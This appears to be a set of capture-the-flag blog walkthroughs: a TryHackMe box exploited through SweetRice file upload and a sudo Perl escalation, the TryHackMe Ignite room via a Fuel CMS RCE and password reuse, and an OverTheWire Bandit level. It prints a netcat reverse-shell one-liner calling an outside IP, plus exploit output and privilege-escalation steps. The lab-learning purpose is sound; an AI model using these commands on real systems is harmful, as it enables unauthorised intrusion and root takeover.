| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

Enter The Target URL(Example : localhost.com) : 10.10.42.242/content
Enter Username : manager
Enter Password : CENSORED
Enter FileName (Example:.htaccess,shell.php5,index.html) : revshell.php
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.42.242/content/attachment/revshell.php

Trying to execute reverse shell. Login successful but not working. Getting a 404 error. There is an attachment folder but nothing inside it.

Now trying PHP CSRF/RCE Exploit

So we will upload a HTML ad containing some PHP code for reverse shell to http://10.10.42.242/content/as/?type=ad

SUCCESS! We got shell! Also found user.txt in /home/itguy/

ls -l
total 56
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Documents
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Downloads
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Music
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Pictures
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Public
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Templates
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Videos
-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
-rw-r--r-- 1 itguy itguy 8980 Nov 29  2019 examples.desktop
-rw-rw-r-- 1 itguy itguy   16 Nov 29  2019 mysql_login.txt
-rw-rw-r-- 1 itguy itguy   38 Nov 29  2019 user.txt

www-data@THM-Chal:/home/itguy$ cat mysql_login.txt
*CENSORED*

MySQL creds. Something to keep in mind for later on.

MySQL Login success. Version info
Server version: 5.7.28-0ubuntu0.16.04.2

3) Privilege Escalation

Let's try running a PrivEsc script to find some vectors

Link to lse.sh => https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Uploaded and running lse.sh -i -l 1 for privesc vectors

Interesting stuff from lse.sh results

[*] usr020 Are there other users in administrative groups?................. yes!
---
adm:x:4:syslog,itguy
sudo:x:27:itguy

[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

This looks interesting. So let's explore this a bit.

Looks like we can run sudo /usr/bin/perl /home/itguy/backup.pl as anyone

Contents of backup.pl, which is readable by www-data

www-data@THM-Chal:/home/itguy$ cat backup.pl 
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

Wish we could edit this, but we can't. What about /etc/copy.sh ?

www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh; cat /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Looks like /etc/copy.sh is world-writable. sysadmin originally set it up to send a reverse shell to another machine. But we will reconfigure it to execute bash and get a root shell.

After modification

www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
/bin/bash -i

Time for action!

www-data@THM-Chal:/home/itguy$ sudo -u root /usr/bin/perl /home/itguy/backup.pl
root@THM-Chal:/home/itguy# id
uid=0(root) gid=0(root) groups=0(root)

Woohoo! And that's that!

TryHackMe Ignite Room Walkthrough

Krishna — Fri, 30 Jul 2021 17:25:56 +0000

https://tryhackme.com/room/ignite

A new start-up has a few issues with their web server.

1. Enumeration

└─$ sudo nmap -p- -A -Pn $IP -oN nmap/results -vv
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:        
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/fuel/               
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS    
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Only one port open, that is port 80.

Upon opening it a browser, it seems to be running Fuel CMS 1.4

Seems to be a default installation. Upon scrolling down we see

In the admin portal

We try the combo of admin:admin and it works. We are in the admin portal.

2. Foothold

Let's search for any exploits that may be available for Fuel CMS on Exploit DB

Great! We seem to have two RCE exploits available. They seem to be for v1.4.1. They should probably work for v1.4 which is what is installed on our target.

Let's try out the first one on the list => 47138

Seems to be a Python script that uses a vulnerability on the "Pages" tab to execute a remote system command. It also seems to be configured to connect to a Burp proxy.

This configuration will come in handy, as once we have the request in the proxy, we can just repeat the commands in the proxy itself, rather than running the exploit on the command line again and again.

We'll have to modify the url variable in the exploit to point to our machine IP.

Have some doubts if this requires a login. But the exploit does not mention anything about this, so let's just run the exploit as is.

It seems to work.

Now instead of running the exploit again on the command line, we just send the Burp request to Repeater so that we can continue to execute commands.

For more complex commands like ls -l, we will have to use URL encoding. This tool is particularly useful => https://meyerweb.com/eric/tools/dencoder/

After trying to ls the /home/ dir, there is one dir inside it, that is www-data. Inside it is the user flag.

To get this, we URL-encode ls -l /home/www-data/ into ls%20-l%20%2Fhome%2Fwww-data%2F and then add it in the URL, replacing the whoami command we sent in the very first Burp request.

flag.txt is world-readable, so this method can be used to read it.

Let's try and get the contents of /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false

So there is a local MySQL installation. We will remember this for later. Also there seems to be no other user other than root on this system(looking at the UIDs).

Let's try for a reverse shell by simply uploading a php reverse shell file using the Pages section of the admin portal.

Looks like this is not working.

After this I tried using Burp Repeater to execute reverse shell commands from Payloads all the things reverse shell cheatsheet. None of them seemed to work. And I then thought, let's try writing the reverse shell command into a script in /tmp/ and then executing it. This is when I noticed something peculiar.

All the PHP reverse shell files which I had tried to upload using the Pages > Upload view in Fuel CMS, had been copied into /tmp/. Its very simple now. Using the RCE, issue this command cp /tmp/revshell.php .

Now we have the reverse shell file in the document root of the webserver. We simple visit http://MACHINE-IP/revshell.php to execute the reverse shell. And voila!

3. Privilege Escalation

Downloaded the privesc scripts lse.sh and LinPEAS onto the target machine using a Python web server to /tmp/ and then executed them.

Interesting findings from lse.sh results

[*] usr020 Are there other users in administrative groups?................. yes!
---
adm:x:4:syslog,oscp
sudo:x:27:oscp

[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/bin/vmware-user-suid-wrapper

[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/dig
/usr/bin/gcc
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget

[*] net000 Services listening only on localhost............................ yes!
---
tcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  
tcp    LISTEN     0      5      127.0.0.1:631                   *:*

The oscp group is probably an easter egg of some sort. Probably of no use.

Interesting findings from linpeas.sh results

╔══════════╣ Analyzing Backup Manager Files (limit 70)
storage.php Not Found

-rwxrwxrwx 1 root root 4646 Jul 26  2019 /var/www/html/fuel/application/config/database.php
|       ['password'] The password used to connect to the database
|       ['database'] The name of the database you want to connect to
        'password' => '**CENSORED**',
        'database' => 'fuel_schema',

We are able to login to MySQL with the above creds. Although unable to use it for privesc though.

Now whenever we find a root password of any kind, its a good idea to just try a root login with it. Password re-use is a very common problem after all.

The password works! We can use this to get the root flag.

Note: Please watch Dark's video walkthrough on Youtube. It seems I took a roundabout way to get a reverse shell.

OverTheWire Bandit Level 8 Level 9 walk-through

Krishna — Sat, 14 Mar 2020 16:47:57 +0000

Challenge page => https://overthewire.org/wargames/bandit/bandit9.html

Level Goal

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once

Commands you may need to solve this level

grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd

This challenge is similar to the last one as well, as it involves searching for the password in a file that already contains a huge amount of text, making manual searching impractical.

Let's take a look at the file in question shall we?

Normally this is where I would put the Hint 1 part. But if you've been reading the previous walk-throughs and trying to solve this on your own, Google or DuckDuckGo should have been your first goto step. So its a pretty obvious hint.

Do not hesitate to use the search engines! Its not possible for one person to know everything. Besides, this is a learning process. You will naturally remember the commands after enough practice.

So, after some web searches, we can safely narrow down the commands required to sort and uniq

sort well, sorts the text files in alphabetical order.

uniq (from the DESCRIPTION section in its man file)

Filter adjacent matching lines from INPUT (or standard input), writing to OUTPUT (or standard output).
With no options, matching lines are merged to the first occurrence.

So uniq cannot work on its own, as it needs a file with identical lines adjacent to each other, which will only happen if the file was sorted beforehand.

So we will need to pipe the output of sort to uniq to get the unique lines. Let's try it out shall we?

Well, that didn't go as planned. Looks like we should have paid more attention to the documentation!

Turns out, uniq filters out duplicate lines that are adjacent to each other, and sends the original to stdout. But the password is on the only line of text that occurs only once

How do we get uniq to print out only those lines that occur only once in its input stream?

Hint: Look in the man page :)

Turns out uniq has a pretty convenient flag -u that ensures only unique lines are printed.

So the final command would be sort data.txt | uniq -u

Onto the next challenge!